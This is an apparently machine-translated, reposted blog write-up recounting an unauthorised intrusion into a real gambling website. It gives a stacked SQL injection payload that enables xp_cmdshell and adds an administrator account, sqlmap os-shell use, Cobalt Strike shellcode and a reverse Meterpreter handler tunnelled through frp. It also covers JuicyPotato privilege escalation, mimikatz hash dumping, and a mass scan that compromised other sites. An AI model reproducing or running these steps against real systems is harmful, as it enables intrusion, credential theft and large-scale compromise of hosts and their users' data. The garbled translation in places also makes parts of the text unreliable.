Title: Practical gambling site - From weak password to escalation of power

0x00  Preface

Our small team infiltrated the bc site that was discovered by chance. From the beginning, only the sqlmap rebounded without echoes, to the CS online, to the process of cooperating with MSF to the process of upgrading the rights of dirty potatoes, to the process of obtaining SYSTEM permissions, share and record the penetration process

0x01 Login box sql injection

I saw that there is nothing to say about the login box, try SQLmap shuttle first

Burp packet capture login request, save it to the file and run it directly to try

python3 sqlmap.py -r '2.txt' has blind and stack injection

See if you can use SQLmap to get shell

python3 sqlmap.py -r '2.txt' --os-shell visually unsuccessful

The prompt is that xp_cmdshell is not enabled. Since there was stack injection after scanning out before, try to use the stored procedure to open xp_cmdshell.

Payload:

userName=admin';exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure'xp_cmdshell', 1;RECONFIGURE;WAITFOR DELAY '0:0:15' --password=123 Delay 15 seconds, execution is successful (if there is no stack injection, each statement is split and executed one sentence at a time, the effect should theoretically be the same)

By the way, try to use xp_cmdshell to add user rights and construct payload (note that the password should not be set too simple. The Windows system seems to have requirements for password strength, but if the password is set too simple, it may fail)

userName=admin';exec xp_cmdshell 'net user cmdshell Test ZjZ0ErUwPcxRsgG8E3hL /add';exec master.xp_cmdshell 'net localgroup administrators Test /add';WAITFOR DELAY '0:0:15' --password=123nmap Scan, the target 3389 is open, mstsc.exe is directly connected

Not connected

Run os-shell again and find that you can run the absolute path, which is a good sign

Successfully popped up shell

Because it is a blind note, I did not echo the commands such as whoami, so I directly used a shellcode for CS

The generated shellcode is pasted directly into the os-shell and then returned to the car

Then the CS went online, and it was soon. Hurry up and call a few young people who are not moral and moral to go online to play cards

0x02 Information Collection

tasklist, check the process, it is a bit difficult to do with Alibaba Cloud Shield

systeminfo see what's there

Alibaba Cloud's server, version of Windows Server 2008 R2 has 75 patches

Whoami, it is estimated that the database has been reduced in power, and the service permissions are very low

Try to upload an exp from ms-16-032, and the upload failed directly

At this point, the role of CS is extremely limited. CS is just a pleasure, and it depends on MSF.

0x03  Use frp to CS server to link MSF attacks

Open a listener on CS

Modify the configuration file of frp

After saving the configuration file, start frp in the frp folder

./frpc -c frpc.ini

Turn on msf to enable monitoring

use exploit/multi/handlerset payload windows/meterpreter/reverse_httpset LHOST 127.0.0.1set LPORT 9996run Here you can see that MSF has been turned on to monitor

Go back to CS, right-click to select a host and add a session

Choose the listener you just created, choose

Back to msf, the session bounced back, very quickly

Let's go to the shell and take a look. In fact, it took over the beacon of CS, and it still has low permissions

0x04 Upload Rotten Potato EXP to EXP

Prepare a EXP with rotten potatoes locally (note that you add more slashes on the windows path, although you can not add them, but after trying a few machines, I found that the success rate of adding is high, I don’t know what the principle is)

upload /root/EXP/JuicyPotato/potato.exe C:\\Users\\Public

CS flipped through the file of the target machine and found that it was successfully uploaded

Then enter the folder of the target machine to start preparing for the escalation of rights

cd C:\\Users\\Publicuse incognitoexecute -cH -f ./potato.exelist_tokens -u Copy administrator's token impersonate_token 'administrator'

Finally, check whether the escalation is successful

0x05 mimikatz crawl password hash

First raise the right

getsystem

Try to dump it directly

No, I have to use mimikatz

load mimikatz and crawl password hash

mimikatz_command -f samdump:hashes

You can also use the modules that come with MSF (this is a little slower than mimikatz)

run post/windows/gather/smart_hashdump

Then throw it to CMD5 to decrypt it. If it is a weak password, you can uninstall the account password. This time, you are lucky. It is a weak password. You can uninstall the password directly. Then mstsc.exe is connected directly and successfully launched on the desktop.

0x06 Information collection expands attack range

After successfully obtaining the target's highest permission, try to obtain other similar sites through information collection to carry out batch attacks.

@crow Master extracted the CMS feature of the website and wrote a fofa script to scan in batches, and finally got 1900+ sites.

However, since BC stations often shoot and change places, most of these domain names are often unavailable, so the survival status of the domain name needs to be confirmed again. Using the script, the last step is to obtain more than 100 surviving domain names.

When using scripts to access vulnerable URLs in batches, use the generated request to batch initiate requests to run this request using multi-threaded scripts

python3 sqlmap.py -r '{0}' --dbms='Microsoft SQL Server' --batch --os-shell finally gets a host that can pop up os-shell, and then manually inject shellcode, and finally gets a large number of online hosts

0x07 Go to the backstage to visit

Use the administrator account password found in the database to log in to the website background to take a look

20 people recharged more than 800,000

There are also people’s game accounts called “Bright Future”, but they don’t know that online gambling is destroying their own future!

I advise everyone to stay away from gambling, and I hope that the gamblers who are trapped in will turn back!

Reprinted in the original link address: https://mp.weixin.qq.com/s?__biz=MzI3NjA4MjMyMw==mid=2647772541idx=1sn=646e732c96521e0d4d9d109426c4dc4dchksm=f35f9681c4281f97b4c46cd95f858dc90481706a6db607fcfd6596a15745ca10c88ba83e0e9fscene=21#wechat_redirect